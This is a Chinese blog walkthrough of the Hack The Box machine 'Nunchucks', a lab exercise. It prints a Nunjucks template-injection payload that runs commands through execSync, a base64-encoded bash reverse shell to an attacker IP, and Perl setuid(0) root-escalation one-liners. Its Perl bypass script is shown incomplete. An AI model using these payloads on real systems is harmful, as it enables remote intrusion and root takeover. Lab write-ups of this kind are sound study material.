HTB_Nunchucks

于 2022-10-02 22:30:24 发布
阅读量363 收藏
点赞数
文章标签: 安全 web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/127147197
版权

目录

一 渗透测试

(一)信息收集

1 端口扫描

2 组件框架

3 目录/子域名收集

(二)漏洞发现

1 SSTI

(二)CPA_perl提权

1 linpeas快速搜寻可疑提权点

2 perl提权

二 知识点

(一)SSTI

(二)CPA_perl提权

前言

模板可理解为一段固定好格式文件,只需用户填充信息。通过这种方法,可以做到逻辑与视图分离,更容易、清楚且相对安全地编写前后端不同的逻辑。模板基础形式:

{% ... %} 用来声明变量

{{ ... }} 用来将表达式打印到模板输出

{# ... #} 表示未包含在模板输出中的注释

在模板注入中,主要使用的是{{}} 和 {%%}

当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。

SSTI:如果用户输入作为【模板当中变量的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。但是如果用户输入作为了【模板内容的一部分】,用户输入会原样输出。

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

一 渗透测试

(一)信息收集

1 端口扫描

 发现22/80/443端口开放

2 组件框架

 使用Node.js环境,express服务,可考虑node.js反序列化漏洞,express框架登录绕过等漏洞

3 目录/子域名收集

访问80端口发现跳转到https://nunchucks.htb

 

添加到hosts文件

# echo '10.10.11.122 nunchucks.htb' >>/etc/hosts

子域名挖掘 

# gobuster vhost -w /usr/share/wordlists/dirb/common.txt -u https://nunchucks.htb/ -k

获取到子域store.nunchucks.htb添加到hosts文件

# echo '10.10.11.122 store.nunchucks.htb' >>/etc/hosts  

漏洞发现

1 SSTI

访问https://store.nunchucks.htb输入邮箱时会输出邮箱,可考虑XSS,并且网站一般不是.jsp/.php/.asp等脚本语言时,那么可能是go/python等其他开发语言架构时,可尝试服务器端模板注入SSTI。

 

1.1 SSTI测试

使用常规模板{{7*7}}测试

 返回信息可知当前存在SSTI漏洞。

1.2 确定模板引擎

站点使用node.js环境搜索nodejs templating engine(node模板引擎)。

 发现Nunjucks。

接着搜索Nunjucks templating engine

 拿到Payload:{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

 

1.3 SSTI反弹shell

#{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzk5OTkgMD4mMSIK| base64 -d |bash')\")()}}@qq.com"

 成功拿到user.txt

(二)CPA_perl提权

1 linpeas快速搜寻可疑提权点

 发现/bin/perl具备cap权限,也可以使用命令定位具备cap权限文件

#getcap -r / 2>dev/null

 

2 perl提权

2.1 CAP_perl常规提权失败

#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

失败,猜测是perl被限制执行命令。

2.2 验证perl是否被限制部分命令

#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

回显root,确认是被限制了使用部分命令

2.3  CAP_perl被限制绕过

思路:写一个perl运行环境的脚本test.pl

/*

#!/usr/bin/perl

use POSIX qw(strftime);

use POSIX qw(setuid);

POSIX::setuid(0);

*/

 成功拿到root权限

二 知识点

(一)SSTI

当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

(二)CPA_perl提权

Capability在linux中和suid相似,用来让普通用户具有超级用户权限工作,传统的linux分为超级用户和普通用户,后面增加了capability,用来赋予某个用户去执行高权限指令。

Capability可以分割root权限:

CPA_CHOWN:修改文件属性的权限

CPA_FSETID:允许设置位置文件setuid位

CPA_SETUID:允许改变进程的用户ID

CPA_SETGID:允许改变进程的组ID

CPA_perl,可使用#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'提升到root权限。

但perl在被限制某些权限时,可考虑创建pl脚本执行/bin/bash成功拿到root权限。

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[HTB]Nunchucks
cosmoslin的博客
11-14 2006
信息搜集 nmap 发现开放端口: SSH (22), HTTP (80), and HTTPS (443) cosmos@kali:/$ nmap -A 10.10.11.122 Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-13 20:44 CST Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: Abo.
linux系统利用可执行文件的Capabilities实现权限提升
whatday的专栏
10-25 2680
一、操作目的和应用场景 Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。 这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为
9杂
253765952
11-30 231
1.time use POSIX qw(strftime); use feature qw(say); my $time = localtime(time); #标量上下文返回标量 say $time; say time; #time返回时间值 #my ($sec,$min,$hour,$day,$mon,$year-1990,@other) = localtime(time)...
几道nodejs题目的分析
stepone4ward的博客
04-01 2349
三道原型链污染,一道拆分请求攻击
perl 的linux信号处理,perl 信号处理
weixin_34743057的博客
05-14 186
转载文章请注明,转载自:扶凯[]本文链接:linux中的信号先了解在linux中的信号,信号其实就是编程里俗称的中断,它使监视与控制其他进程变为有可能。中断信号(signal,又简称为信号)用来通知进程发生了异步事件。进程之间可以互相通过系统调用kill发送软中断信号。内核也可以因为内部事件而给进程发送信号,通知进程发生了某个事件。注意,信号只是用来通知某进程发生了什么事件,并不给该进程传递任何数...
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
Perl自学(09)——时间日期
陌上人如玉,公子世无双。
07-22 1027
Perl中处理时间的函数有如下几种: time() 函数:返回从1970年1月1日起累计的秒数 localtime() 函数:获取本地时区时间 gmtime() 函数:获取格林威治时间 1. 当地时间——localtime() 函数 localtime()函数,该函数在没有参数的情况下返回当前的时间和日期。 sec, # 秒, 0 到 61 min, # 分钟, 0 到 59 hour, # 小时, 0 到 24 mday, # 天, 1 到 31 mon, ..
perl中的q,qq,qw,qr,qx
weixin_34337265的博客
12-03 247
从网上看到的一篇文章,觉得不错,转过来了。 在perl语言中,几个特殊而常用的符号:    q  是单引号   qq 是双引号   qw 单词列表引号   qr 正则表达式引号   qx 反引号   其中qq,qw又较为常用。   qq{foobar}的意思为意思为双引号字符串,可内插变量,相当于 "foobar"   qw{foo bar}的意思为用空格分解字符串,得到列表...
Perl之POSIX
lzqustc的专栏
03-22 3035
利用POSIX模块处理 向下/向上取整   use POSIX; POSIX::ceil(3.14) => 4   #向上取整 POSIX::floor(3.14) => 3   # 向下取整, 等同于 int(3.14)   利用Math::Round 做四舍五入   use Math::Round; my $num = 45.4; my $round = M...
perl时间处理
weixin_30667301的博客
04-04 345
(1)格式化输出当前时间:perl -e 'use strict;use POSIX qw(strftime);print strftime("%Y-%m-%d %H:%M:%S\n", localtime(time));'(2)时间格式转换:perl -e 'use Time::Local;use Time::Piece;$s = "2011-05-03 10:00:00";$fmt = "%Y...
Perl脚本常用操作
热门推荐
Sugar的博客
08-10 1万+
一、Perl脚本连接数据库#! /usr/bin/perl use URI::Escape; use POSIX qw(strftime); use DBI; require "public.pl"; my $source_file = "read.log"; #读取文件 my $dest_file = "write.txt"; #写入文件 my $db = DBI->connect("DBI:
我从Typoro中学到的Child Process知识点(三)
小朱的专栏
11-30 1059
相关链接:我从Typoro中学到的Clipboard妙用我从Typoro中学到的Clipboard妙用(二) 混沌前端 分享技术、工作和生活。 9篇原创内容
require 方法详解
编程三昧
06-15 7212
在 NodeJS 中有一个方法是我们使用频率最高的,那就是 require 方法。NodeJs 遵循 CommonJS 规范,该规范的核心是通过 require来加载其他依赖的模块。 几个问题 module.exports 或者 exports 是全局变量吗? 模块的加载是同步还是异步? 循环引用会不会产生性能问题或者导致错误? 什么是 CommonJS 每一个文件就是一个模块,拥有自己独立的作用域,变量,以及方法等,对其他的模块都不可见。CommonJS 规范规定,每个模块内部,module 变量代
Node.js 中的 require 是如何工作的?
程序员成长指北
09-09 333
作者:FESKY 链接:https://juejin.im/post/6844903957752463374作为前端开发者,不可避免每天都要跟 Node.js 打交道。Node 遵循 C...
node源码详解(三)—— js代码在node中的位置,process、require、module、exports的由来...
weixin_30361753的博客
03-12 158
本作品采用知识共享署名 4.0 国际许可协议进行许可。转载保留声明头部与原文链接https://luzeshu.com/blog/nodesource3本博客同步在https://cnodejs.org/topic/56e3dfde545c5c736d12383f本博客同步在http://www.cnblogs.com/papertree/p/5225994.html   我们用惯了p...
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值